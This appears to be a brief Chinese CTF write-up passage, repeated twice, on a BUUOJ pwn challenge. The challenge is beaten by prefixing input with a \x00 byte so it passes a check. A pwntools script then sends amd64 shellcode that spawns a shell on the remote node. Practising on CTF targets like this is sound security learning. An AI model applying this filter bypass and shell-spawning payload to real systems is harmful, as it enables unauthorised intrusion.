绕过检查,即可写入shellcode 。
我们只需要,输入一个以\x00开头的汇编指令,随后写入shellcode即可执行。
from pwn import *
context.arch="amd64"
p=remote('node4.buuoj.cn',29743)
shellcode='\x00J'+'\x00'+asm(shellcraft.sh())
p.sendline(shellcode)
p.interactive()
绕过检查,即可写入shellcode 。
我们只需要,输入一个以\x00开头的汇编指令,随后写入shellcode即可执行。
from pwn import *
context.arch="amd64"
p=remote('node4.buuoj.cn',29743)
shellcode='\x00J'+'\x00'+asm(shellcraft.sh())
p.sendline(shellcode)
p.interactive()